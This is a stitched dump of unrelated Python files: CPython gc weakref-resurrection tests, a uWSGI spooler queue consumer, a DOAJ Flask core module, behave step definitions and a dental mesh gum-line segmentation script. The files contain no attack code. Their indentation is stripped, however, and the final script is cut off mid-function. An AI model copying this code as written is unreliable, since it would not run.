# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print "restoring automatic collection"
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
tasksconsumer.py
|
from uwsgidecorators import *
import Queue
from threading import Thread
queues = {}
class queueconsumer(object):
def __init__(self, name, num=1, **kwargs):
self.name = name
self.num = num
self.queue = Queue.Queue()
self.threads = []
self.func = None
queues[self.name] = self
@staticmethod
def consumer(self):
while True:
req = self.queue.get()
print req
self.func(req)
self.queue.task_done()
def __call__(self, f):
self.func = f
for i in range(self.num):
t = Thread(target=self.consumer,args=(self,))
self.threads.append(t)
t.daemon = True
t.start()
@spool
def spooler_enqueuer(arguments):
if 'queue' in arguments:
queue = arguments['queue']
queues[queue].queue.put(arguments)
else:
raise Exception("You have to specify a queue name")
def enqueue(*args, **kwargs):
return spooler_enqueuer.spool(*args, **kwargs)
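# Hedged usage sketch (kept commented out; the names below are illustrative only): register a
# consumer for a named queue, then push work to it from request-handling code via the uWSGI
# spooler. Decorating starts `num` daemon consumer threads, so this belongs in real app code.
#
#   @queueconsumer('emails', num=2)
#   def handle_email(arguments):
#       # 'arguments' is the dict passed to enqueue(), including the 'queue' key
#       deliver(arguments['to'])
#
#   enqueue(queue='emails', to='user@example.com')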
|
core.py
|
import os
import threading
import yaml
from flask import Flask
from flask_debugtoolbar import DebugToolbarExtension
from flask_login import LoginManager
from flask_cors import CORS
from jinja2 import FileSystemLoader
from lxml import etree
from portality import settings, constants
from portality.bll import exceptions
from portality.error_handler import setup_error_logging
from portality.lib import es_data_mapping
import esprit
login_manager = LoginManager()
@login_manager.user_loader
def load_account_for_login_manager(userid):
from portality import models
out = models.Account.pull(userid)
return out
def create_app():
app = Flask(__name__)
configure_app(app)
setup_error_logging(app)
setup_jinja(app)
app.config["LOAD_CROSSREF_THREAD"] = threading.Thread(target=load_crossref_schema, args=(app, ), daemon=True)
app.config["LOAD_CROSSREF_THREAD"].start()
login_manager.init_app(app)
CORS(app)
initialise_apm(app)
DebugToolbarExtension(app)
proxyfix(app)
build_statics(app)
return app
def configure_app(app):
"""
Configure the DOAJ from:
a) the settings.py file
b) the <env>.cfg file
c) the local secrets config in app.cfg
Later imports have precedence, so e.g. app.cfg will override the same setting in production.cfg and settings.py.
"""
# import for settings.py
app.config.from_object(settings)
# import from <env>.cfg
here = os.path.dirname(os.path.abspath(__file__))
app.config['DOAJENV'] = get_app_env(app)
config_path = os.path.join(os.path.dirname(here), app.config['DOAJENV'] + '.cfg')
print('Running in ' + app.config['DOAJENV']) # the app.logger is not set up yet (?)
if os.path.exists(config_path):
app.config.from_pyfile(config_path)
print('Loaded environment config from ' + config_path)
# import from app.cfg
config_path = os.path.join(os.path.dirname(here), 'app.cfg')
if os.path.exists(config_path):
app.config.from_pyfile(config_path)
print('Loaded secrets config from ' + config_path)
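# Worked illustration (added; the values are hypothetical) of the precedence described in the
# configure_app docstring above -- each later from_object/from_pyfile call overwrites earlier keys:
#
#   settings.py:     ELASTIC_SEARCH_HOST = "http://localhost:9200"
#   production.cfg:  ELASTIC_SEARCH_HOST = "http://es.internal:9200"
#   app.cfg:         ELASTIC_SEARCH_HOST = "http://es.secret:9200"
#
#   app.config["ELASTIC_SEARCH_HOST"]  ->  "http://es.secret:9200"   (app.cfg wins)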
def get_app_env(app):
if not app.config.get('VALID_ENVIRONMENTS'):
raise Exception('VALID_ENVIRONMENTS must be set in the config. There shouldn\'t be a reason to change it in different set ups, or not have it.')
env = os.getenv('DOAJENV')
if not env:
envpath = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../.env')
if os.path.exists(envpath):
with open(envpath, 'r') as f:
env = f.readline().strip()
if not env or env not in app.config['VALID_ENVIRONMENTS']:
raise Exception(
"""
Set the DOAJENV environment variable when running the app, guessing is futile and fraught with peril.
DOAJENV=test python portality/app.py
to run the app will do.
Or use the supervisord options - put this in the config: environment= DOAJENV="test" .
Finally, you can create a file called .env with the text e.g. 'dev' in the root of the repo.
Recommended only for dev environments so you don't have to bother specifying it each time you run a script or test.
Valid values are: {valid_doajenv_vals}
You can put environment-specific secret settings in <environment>.cfg , e.g. dev.cfg .
The environment specified in the DOAJENV environment variable will override that specified in the
application configuration (settings.py or app.cfg).
""".format(valid_doajenv_vals=', '.join(app.config['VALID_ENVIRONMENTS']))
)
return env
def load_crossref_schema(app):
schema_path = app.config["SCHEMAS"].get("crossref")
if not app.config.get("CROSSREF_SCHEMA"):
try:
schema_doc = etree.parse(schema_path)
schema = etree.XMLSchema(schema_doc)
app.config["CROSSREF_SCHEMA"] = schema
except Exception as e:
raise exceptions.IngestException(
message="There was an error attempting to load schema from " + schema_path, inner=e)
def create_es_connection(app):
# temporary logging config for debugging index-per-type
#import logging
#esprit.raw.configure_logging(logging.DEBUG)
# make a connection to the index
if app.config['ELASTIC_SEARCH_INDEX_PER_TYPE']:
conn = esprit.raw.Connection(host=app.config['ELASTIC_SEARCH_HOST'], index='')
else:
conn = esprit.raw.Connection(app.config['ELASTIC_SEARCH_HOST'], app.config['ELASTIC_SEARCH_DB'])
return conn
def mutate_mapping(conn, type, mapping):
""" When we are using an index-per-type connection change the mappings to be keyed 'doc' rather than the type """
if conn.index_per_type:
try:
mapping[esprit.raw.INDEX_PER_TYPE_SUBSTITUTE] = mapping.pop(type)
except KeyError:
# Allow this mapping through unaltered if it isn't keyed by type
pass
# Add the index prefix to the mapping as we create the type
type = app.config['ELASTIC_SEARCH_DB_PREFIX'] + type
return type
def put_mappings(conn, mappings):
# get the ES version that we're working with
es_version = app.config.get("ELASTIC_SEARCH_VERSION", "1.7.5")
# for each mapping (a class may supply multiple), create a mapping, or mapping and index
for key, mapping in iter(mappings.items()):
altered_key = mutate_mapping(conn, key, mapping)
ix = conn.index or altered_key
if not esprit.raw.type_exists(conn, altered_key, es_version=es_version):
r = esprit.raw.put_mapping(conn, altered_key, mapping, es_version=es_version)
print("Creating ES Type + Mapping in index {0} for {1}; status: {2}".format(ix, key, r.status_code))
else:
print("ES Type + Mapping already exists in index {0} for {1}".format(ix, key))
def initialise_index(app, conn):
if not app.config['INITIALISE_INDEX']:
app.logger.warn('INITIALISE_INDEX config var is not True, initialise_index command cannot run')
return
if app.config.get("READ_ONLY_MODE", False) and app.config.get("SCRIPTS_READ_ONLY_MODE", False):
app.logger.warn("System is in READ-ONLY mode, initialise_index command cannot run")
return
# get the app mappings
mappings = es_data_mapping.get_mappings(app)
# Send the mappings to ES
put_mappings(conn, mappings)
def initialise_apm(app):
if app.config.get('ENABLE_APM', False):
from elasticapm.contrib.flask import ElasticAPM
app.logger.info("Configuring Elastic APM")
apm = ElasticAPM(app, logging=True)
def proxyfix(app):
if app.config.get('PROXIED', False):
from werkzeug.middleware.proxy_fix import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1, x_host=1)
def setup_jinja(app):
'''Add jinja extensions and other init-time config as needed.'''
app.jinja_env.add_extension('jinja2.ext.do')
app.jinja_env.add_extension('jinja2.ext.loopcontrols')
app.jinja_env.globals['getattr'] = getattr
app.jinja_env.globals['type'] = type
app.jinja_env.globals['constants'] = constants
_load_data(app)
app.jinja_env.loader = FileSystemLoader([app.config['BASE_FILE_PATH'] + '/templates',
os.path.dirname(app.config['BASE_FILE_PATH']) + '/cms/fragments'])
# a jinja filter that prints to the Flask log
def jinja_debug(text):
print(text)
return ''
app.jinja_env.filters['debug']=jinja_debug
def _load_data(app):
if not "data" in app.jinja_env.globals:
app.jinja_env.globals["data"] = {}
datadir = os.path.join(app.config["BASE_FILE_PATH"], "..", "cms", "data")
for datafile in os.listdir(datadir):
with open(os.path.join(datadir, datafile)) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
dataname = datafile.split(".")[0]
dataname = dataname.replace("-", "_")
app.jinja_env.globals["data"][dataname] = data
def build_statics(app):
if not app.config.get("DEBUG", False):
return
from portality.cms import build_fragments, build_sass
here = os.path.dirname(os.path.abspath(__file__))
base_path = os.path.dirname(here)
print("Compiling static content")
build_fragments.build(base_path)
print("Compiling SASS")
build_sass.build(base_path)
app = create_app()
es_connection = create_es_connection(app)
|
deal.py
|
# pylint: disable=missing-docstring, no-name-in-module, invalid-name
from os import getcwd, chdir
from threading import Thread
from behave import given, when, then
from nose.tools import assert_true, assert_equal, assert_is_none, assert_is_not_none
from nose.tools import assert_in, assert_not_in, assert_greater
from bddbot.dealer import Dealer, STATE_PATH
from bddbot.server import BankServer
from bddbot.config import BotConfiguration
from bddbot.errors import BotError
@given("{count:Count} scenario/s were dealt")
def n_scenarios_were_dealt(context, count):
if not context.dealer:
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
for _ in xrange(count):
context.dealer.deal()
context.dealt += 1
@when("the dealer is loaded")
def load_dealer(context):
assert_is_none(context.dealer)
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
try:
context.dealer.load()
except BotError as error:
context.error = error
@when("the dealer is loaded on {side:Side}")
def load_dealer_on_side(context, side):
assert_not_in(side, context.bot_config)
assert_not_in(side, context.dealer)
# Change to side's sandbox.
original_directory = getcwd()
chdir(context.sandbox[side].path)
config = BotConfiguration()
dealer = Dealer(config.banks, config.tests, name = side)
context.bot_config[side] = config
context.dealer[side] = dealer
try:
context.dealer[side].load()
except BotError as error:
context.error = error
# Return to original working directory.
chdir(original_directory)
@when("the server is started")
def server_is_started(context):
assert_is_none(context.server)
assert_is_none(context.server_thread)
assert_in("server", context.bot_config)
assert_is_not_none(context.bot_config["server"].host)
assert_is_not_none(context.bot_config["server"].port)
# Change to side's sandbox.
original_directory = getcwd()
chdir(context.sandbox["server"].path)
context.server = BankServer(
context.bot_config["server"].host,
context.bot_config["server"].port,
context.bot_config["server"].banks)
context.server_thread = Thread(target = context.server.serve_forever)
context.server_thread.start()
# Return to original working directory.
chdir(original_directory)
@when("the bot is restarted")
def restart_the_bot(context):
assert_is_not_none(context.dealer)
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
@when("the bot's state is saved")
def save_state(context):
context.dealer.save()
assert_in(STATE_PATH, context.sandbox.actual())
@when("the first scenario is dealt")
def first_scenario_is_dealt(context):
assert_equal(0, context.dealt)
if not context.dealer:
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
try:
context.dealer.deal()
except BotError as error:
context.error = error
context.dealt += 1
@when("a scenario is dealt on {side:Side}")
def scenario_is_dealt_on_side(context, side):
if side not in context.dealer:
load_dealer_on_side(context, side)
original_directory = getcwd()
chdir(context.sandbox[side].path)
try:
context.dealer[side].deal()
except BotError as error:
context.error = error
# Return to original working directory.
chdir(original_directory)
@when("another scenario is dealt")
def another_scenario_is_dealt(context):
assert_is_not_none(context.dealer)
assert_greater(context.dealt, 0)
try:
context.dealer.deal()
except BotError as error:
context.error = error
context.dealt += 1
@then("there are no more scenarios to deal")
def no_more_scenarios(context):
assert_is_none(context.error)
assert_is_not_none(context.dealer)
assert_true(context.dealer.is_done)
|
show_result.py
|
#!/usr/bin/env python
# coding: utf-8
""""
Usage: python show_data.py
"""
# In[1]:
import os
import numpy as np
from scipy import spatial
import glob
from multiprocessing import Process
from tqdm import tqdm
from vedo import load, show, Point
import math
import sys
# ## 1. Custom functions
# ### 1. Get model information
# In[2]:
def get_edges(faces):
"""
    Derive the corresponding edges from the faces.
    @faces: all faces of the model
    return: the edges of the model
"""
edge2key = dict()
edges = []
edges_count = 0
for face_id, face in enumerate(faces):
faces_edges = []
for i in range(3):
cur_edge = (face[i], face[(i + 1) % 3])
faces_edges.append(cur_edge)
for idx, edge in enumerate(faces_edges):
edge = tuple(sorted(list(edge)))
if edge not in edge2key:
edge2key[edge] = edges_count
edges_count += 1
edges.append(list(edge))
return edges
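# Worked example (added for illustration): for a single triangle the three directed
# half-edges collapse to three unique undirected edges.
#
#   get_edges(np.array([[0, 1, 2]]))
#   # -> [[0, 1], [1, 2], [0, 2]]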
def parse_obje(obj_file):
"""
    Parse an obj file to get vertices, edges and faces.
    @obj_file: path to the obj model file
    return: the model's vertex, face and edge information
"""
vs = []
faces = []
edges = []
with open(obj_file) as f:
for line in f:
line = line.strip()
splitted_line = line.split()
if not splitted_line:
continue
elif splitted_line[0] == 'v':
vs.append([float(v) for v in splitted_line[1:]])
elif splitted_line[0] == 'f':
try:
faces.append([int(c) - 1 for c in splitted_line[1:]])
except ValueError:
faces.append([int(c.split('/')[0]) - 1 for c in splitted_line[1:]])
elif splitted_line[0] == 'e':
if len(splitted_line) >= 4:
edge_v = [int(c) - 1 for c in splitted_line[1:-1]]
edge_c = int(splitted_line[-1])
edge_v.append(edge_c) # class
edges.append(edge_v)
else:
continue
vs = np.array(vs)
faces = np.array(faces, dtype=int)
# if len(edges) == 0:
# edges = get_edges(faces)
edges = np.array(edges)
return vs, faces, edges
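# Illustrative note (hypothetical file content): parse_obje understands plain obj vertex and
# face lines plus the non-standard 'e' lines this project writes (two vertex ids and a class):
#
#   v 0.0 0.0 0.0
#   v 1.0 0.0 0.0
#   v 0.0 1.0 0.0
#   f 1 2 3
#   e 1 2 0
#
# which yields vs of shape (3, 3), faces == [[0, 1, 2]] (0-based) and edges == [[0, 1, 0]].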
# ### 2. Label faces using edge labels
# In[3]:
def label_face_by_edge(faces, edges, edge_labels):
"""
    Label the faces using the edge labels.
    @faces: faces of the model
    @edges: edges of the model
    @edge_labels: labels of the model's edges
    return: labels of the faces
"""
edge_dict = {} # key: str([pt1, pt2]) value: label
for ei, edge in enumerate(edges):
key = tuple(edge)
edge_dict[key] = edge_labels[ei]
# print(edge_dict)
face_labels = np.array(len(faces) * [[-1, -1, -1]])
for i, face in enumerate(faces):
# faces_edges = []
for j in range(3):
cur_edge = [face[j], face[(j + 1) % 3]]
cur_label = edge_dict[tuple(sorted(cur_edge))]
face_labels[i][j] = cur_label
# face_labels.append(faces_edges)
face_labels = np.where(np.sum(face_labels, axis=1) < 2, 1, 2)
    optimizer_face_labels(faces, face_labels)  # optimize the face labels (dilation / fill)
return face_labels
def find_neighb_faces(face_id, faces):
face = faces[face_id]
nb_face = []
for i in range(3):
cur_edge = [face[i], face[(i + 1) % 3]]
pt1 = cur_edge[0]
pt2 = cur_edge[1]
face_ids = find_faces_by_2point(faces, pt1, pt2)
if len(face_ids) == 2:
nb_face_id = face_ids[0][0] if face_ids[0][0] != face_id else face_ids[1][0]
nb_face.append(nb_face_id)
return nb_face
def optimizer_face_labels(faces, face_labels):
# new_face_labels = face_labels.copy()
for i, face in enumerate(faces):
nb_faces = find_neighb_faces(i, faces)
nb_labels = []
for face_id in nb_faces:
nb_labels.append(face_labels[face_id])
if len(nb_labels) == 0:
continue
counts = np.bincount(nb_labels)
        # take the mode (most common neighbour label)
if face_labels[i] != np.argmax(counts):
# print("face: {}, label:{} nb_labels: {}, 众数: {}".format(i, face_labels[i], nb_labels, np.argmax(counts)))
face_labels[i] = np.argmax(counts)
# ### 3. Label points using edges
# In[4]:
def label_pts_by_edges(vs, edges, edge_labels):
"""
    Label the points according to the edge labels.
    @vs: vertices of the model
    @edges: edges of the model
    @edge_labels: labels of the model's edges
    return: labels of the model's vertices
"""
pts_labels = np.array(len(vs) * [[-1, -1]])
for ei, edge in enumerate(edges):
edge_label = edge_labels[ei]
pt1 = edge[0]
pt2 = edge[1]
pts_labels[pt1][edge_label] = edge_label
pts_labels[pt2][edge_label] = edge_label
return pts_labels
# In[5]:
def find_faces_by_2point(faces, id1, id2):
"""
    Given two points, find the two faces that share the edge formed by those points.
    @faces: all faces, N*3, values are vertex ids
    @id1: id of the first point
    @id2: id of the second point
    return: 2*3, [face id, position of the first point, position of the second point]
"""
    p1_faces = np.argwhere(faces == id1)  # row id, column id
p2_faces = np.argwhere(faces == id2)
intersection_faces = []
for val1 in p1_faces:
for val2 in p2_faces:
if val1[0] == val2[0]:
intersection_faces.append([val1[0], val1[1], val2[1]])
return intersection_faces
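# Worked example (added for illustration): two triangles sharing the edge (1, 2).
#
#   faces = np.array([[0, 1, 2], [1, 2, 3]])
#   find_faces_by_2point(faces, 1, 2)
#   # -> [[0, 1, 2], [1, 0, 1]]   i.e. face 0 and face 1 both contain the edge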
# In[6]:
def get_pts_from_edges(edges, threshold=30):
circle_pts = [[]]
count = 0
while len(edges) > 0:
if len(circle_pts[count]) == 0:
circle_pts[count] = list(edges[0])
edges = np.delete(edges, 0, axis=0)
else:
last_id = circle_pts[count][-1]
idx = np.where(edges == last_id)[0]
if len(idx) == 0:
circle_pts.append([])
count += 1
else:
edge = edges[idx[0]]
next_id = edge[0] if edge[0] != last_id else edge[1]
circle_pts[count].append(next_id)
edges = np.delete(edges, idx[0], axis=0)
pts_ids = []
for circle in circle_pts:
        # filter out short loops
if len(circle) > threshold:
# print("{}".format(len(circle)))
            circle = drop_cycle(circle, threshold)  # remove small closed loops
# print("after drop cycle {}".format(len(circle)))
pts_ids.append(circle)
    # TODO: merge the loops when there is more than one (len(pts_ids) > 1)
return pts_ids
def drop_cycle(edge, max_length=20):
"""
删除列表中形成的小闭环
@edge: 原始顶点id
@max_length: 容许闭环的最小长度
return: 输出删除小闭环后的列表
"""
drop_list = []
drop_count = 0
for i, item in enumerate(edge):
if item not in drop_list:
drop_list.append(item)
else:
last_index = len(drop_list) - 1 - drop_list[::-1].index(item)
if i - last_index - drop_count < max_length:
drop_count += len(drop_list[last_index:])
drop_list = drop_list[:last_index+1]
else:
drop_list.append(item)
    # drop the closed loop formed by head and tail, e.g. [956 1035 1538 ...... 2028 1035 952 956] ==> 1035->952->956->1035
circle_count = np.where(np.bincount(drop_list) >= 2)[0]
for item in circle_count:
if item == drop_list[0]:
continue
first_id = drop_list.index(item)
last_id = drop_list[::-1].index(item)
if first_id + last_id <= max_length:
length = len(drop_list)
drop_list = drop_list[first_id:length-last_id]
return np.asarray(drop_list)
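# Illustrative check of drop_cycle with made-up ids: the short detour 2 -> 3 -> 2 is
# shorter than max_length, so it is collapsed and only the main path survives.
def _demo_drop_cycle():
    print(drop_cycle([1, 2, 3, 2, 4], max_length=5))  # [1 2 4]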
# def label_pts_by_edges_and_faces(vs, edges, faces, face_labels):
#     """
#     Label the points using edge and face labels. Each edge borders two faces; if the
#     two face labels differ, keep the edge's points.
#     @vs: vertices of the model
#     @edges: edges of the model
#     @faces: faces of the model
#     @face_labels: labels of the model's faces
#     return: boundary points of the model
#     """
#     pts_labels = np.array(len(vs) * [False])
#     for ei, edge in enumerate(edges):
#         pt1 = edge[0]
#         pt2 = edge[1]
#         face_ids = find_faces_by_2point(faces, pt1, pt2)
#         if len(face_ids) == 2:
#             if face_labels[face_ids[0][0]] != face_labels[face_ids[1][0]]:
#                 pts_labels[pt1] = True
#                 pts_labels[pt2] = True
#
#     return vs[pts_labels]
def label_pts_by_edges_and_faces(vs, edges, faces, face_labels):
"""
根据边和面标签,对点进行标注,一条边对应两个面,如果两个面标签不同,则保留点
@vs: 模型的点
@edges: 模型的边
@faces: 模型的面
@face_labels: 模型面对应的标签
return: 模型边界点
"""
# pts_labels = np.array(len(vs) * [False])
edge_idx = []
for ei, edge in enumerate(edges):
pt1 = edge[0]
pt2 = edge[1]
face_ids = find_faces_by_2point(faces, pt1, pt2)
if len(face_ids) == 2:
if face_labels[face_ids[0][0]] != face_labels[face_ids[1][0]]:
edge_idx.append(ei)
test_edges = np.asarray(edges[edge_idx])
pts_ids = get_pts_from_edges(test_edges)
    # TODO: merge when there are multiple closed loops (len(pts_ids) > 1)
idx = np.array([], dtype=int)
    face_normals, face_areas = compute_face_normals_and_areas(vs, faces)  # compute per-face normals
for pts_id in pts_ids:
# idx = np.append(idx, pts_id)
temp = []
temp.append(pts_id[0])
for i in range(1, len(pts_id) - 1):
last_pt = pts_id[i - 1]
cur_pt = pts_id[i]
next_pt = pts_id[i + 1]
a = vs[last_pt] - vs[cur_pt]
b = vs[next_pt] - vs[cur_pt]
y = a[0] * b[0] + a[1] * b[1] + a[2] * b[2]
x = math.sqrt(a[0] * a[0] + a[1] * a[1] + a[2] * a[2]) * math.sqrt(b[0] * b[0] + b[1] * b[1] + b[2] * b[2])
            # angle formed by the three points
            theta = math.acos(y / x) / math.pi * 180  # no coincident points, so x cannot be zero
if theta > 50:
curvature = compute_pt_curvature(vs, edges, faces, face_normals, cur_pt)
if max(curvature) > 0:
temp.append(cur_pt)
temp.append(pts_id[-1])
idx = np.append(idx, temp)
return vs[idx]
def compute_face_normals_and_areas(vs, faces):
"""
计算每个面的法向量和面积
"""
face_normals = np.cross(vs[faces[:, 1]] - vs[faces[:, 0]],
vs[faces[:, 2]] - vs[faces[:, 1]])
# >>> deal zero face >>>
zeros_idx = np.argwhere((face_normals[:, 0] == 0) & (face_normals[:, 1] == 0) & (face_normals[:, 2] == 0))
normal_mean = np.mean(face_normals, axis=0)
for idx in zeros_idx:
idx = idx[0]
face_normals[idx] = normal_mean
# print("face_normals_idx: ", face_normals[idx])
# <<< deal zero face <<<
face_areas = np.sqrt((face_normals ** 2).sum(axis=1))
# print("n_faces: ", len(faces), mesh.filename)
face_normals /= face_areas[:, np.newaxis]
assert (not np.any(face_areas[:, np.newaxis] == 0)), "has zero area face!"
face_areas *= 0.5
return face_normals, face_areas
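# Sanity-check sketch for compute_face_normals_and_areas (added for illustration): a unit
# right triangle in the XY plane should get the unit +Z normal and an area of 0.5.
def _demo_face_normals():
    vs = np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]])
    faces = np.array([[0, 1, 2]])
    normals, areas = compute_face_normals_and_areas(vs, faces)
    print(normals)  # [[0. 0. 1.]]
    print(areas)    # [0.5]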
def compute_pt_curvature(vs, edges, faces, face_normals, pt_id):
# Reference: https://doi.org/10.1145/3394486.3403272 CurvaNet
c_ij = []
edge_ids, cur_idxs = np.where(edges == pt_id)
for i, edge_id in enumerate(edge_ids):
cur_pt_id = cur_idxs[i]
point_i = edges[edge_id][cur_pt_id]
point_j = edges[edge_id][1 - cur_pt_id]
normal_i = compute_point_normal(faces, face_normals, point_i)
e_ij = vs[point_j] - vs[point_i]
c_ij.append(2 * normal_i.dot(e_ij / (np.sqrt((e_ij ** 2).sum()) + sys.float_info.epsilon)))
return c_ij
def compute_point_normal(faces, face_normals, point_id):
face_ids = get_faces_by_point(faces, point_id)
    normal_sum = face_normals[face_ids].sum(0)  # sum over the incident faces (row-wise)
normal_div = np.sqrt((normal_sum ** 2).sum())
normal = normal_sum / (normal_div + sys.float_info.epsilon)
return normal
def get_faces_by_point(faces, point_id):
point_faces = np.argwhere(faces == point_id)
face_ids = point_faces[:, 0]
return face_ids
# ### 4. Project the edge labels back onto the original model
# In[7]:
def label_origin_edge(predict_edges, predict_labels, predict_vs, origin_edges, origin_vs):
"""
根据预测的边及标签,对原始模型的边进行标注
@predict_edges: 预测模型对应的边
@predict_labels: 预测模型对应的标签
@origin_edges: 原始模型的边
return: 原始模型边对应的标签
"""
predict_edge_pts = predict_vs[predict_edges].reshape(-1, 6)
tree = spatial.KDTree(predict_edge_pts)
origin_edge_pts = origin_vs[origin_edges].reshape(-1, 6)
origin_labels = []
for i, edge in enumerate(origin_edge_pts):
# if i % 50000 == 0:
# print(i, "is finded!")
dist, idx = tree.query(edge)
origin_labels.append(predict_labels[idx])
return origin_labels
# ### 5. Project the points back onto the original model
# In[8]:
def project_points(predict_pts, origin_vs):
"""
根据预测的边,筛选出边界点,将点投影回原模型
@predict_pts: 边界点
@origin_vs: 原始模型所有点
return: 返回原始模型的边界点
"""
tree = spatial.KDTree(origin_vs)
origin_pts = []
for i, pt in enumerate(predict_pts):
dist, idx = tree.query(pt)
origin_pts.append(origin_vs[idx])
origin_pts = np.asarray(origin_pts)
return origin_pts
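# Minimal sketch for project_points with toy data (illustrative only): each predicted
# boundary point is snapped to its nearest vertex of the original model via the KD-tree.
def _demo_project_points():
    origin_vs = np.array([[0.0, 0.0, 0.0], [1.0, 1.0, 1.0]])
    predict_pts = np.array([[0.1, 0.0, 0.0], [0.9, 1.0, 1.0]])
    print(project_points(predict_pts, origin_vs))  # [[0. 0. 0.] [1. 1. 1.]]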
# ### 6. Save the model parts separately for easier display
# In[9]:
def save_model_part(save_path, vs, faces, face_labels, model1_name="mesh1.obj", model2_name="mesh2.obj"):
"""
根据标签将模型标记的部分分别保存
@obj_vs: 模型的顶点
@obj_faces: 模型的面
@face_labels: 面的标签
return: None
"""
mesh1 = open(os.path.join(save_path, model1_name), "w")
mesh2 = open(os.path.join(save_path, model2_name), "w")
for v in vs:
mesh1.write("v " + str(v[0]) + " " + str(v[1]) + " " + str(v[2]) + "\n")
mesh2.write("v " + str(v[0]) + " " + str(v[1]) + " " + str(v[2]) + "\n")
for idx, face in enumerate(faces):
if face_labels[idx] == 1:
mesh1.write("f " + str(face[0]+1) + " " + str(face[1]+1) + " " + str(face[2]+1) + "\n")
if face_labels[idx] == 2:
mesh2.write("f " + str(face[0]+1) + " " + str(face[1]+1) + " " + str(face[2]+1) + "\n")
mesh1.close()
mesh2.close()
# ### 7. Export the boundary points
# In[10]:
def save_pts_to_vtk(pts, save_path="./test.vtk"):
"""
将牙龈点pts格式转为vtk格式
@pts: 点集 [[x, y, z], [x, y, z], ...]
@save_path: 保存路径
return: None
"""
import vtkplotter as vtkp
vtk_point = vtkp.Points(pts.reshape(-1, 3))
vtkp.write(vtk_point, save_path, binary=False)
# print("vtk file is saved in ", save_path)
# ## II. Main function
#
# In[12]:
def save_predict(predict_model, predict_path):
"""
对预测的模型进行分析,找出牙龈线点,并对原始模型进行分割
@predict_model: 预测的模型
@save_path: 结果保存路径
return: None
"""
    # ------ load the model and collect its information ------
    # ## predicted model
predict_vs, predict_faces, predict_edges = parse_obje(predict_model)
if len(predict_edges) == 0:
print("{} is no result!".format(predict_model))
return
origin_model_basename = os.path.basename(predict_model)[:-6]
save_path = os.path.join(predict_path, origin_model_basename)
if not os.path.exists(save_path):
os.makedirs(save_path)
predict_labels = predict_edges[:, -1]
predict_edges = predict_edges[:, :-1]
    # ## label the predicted faces
predict_face_labels = label_face_by_edge(predict_faces, predict_edges, predict_labels)
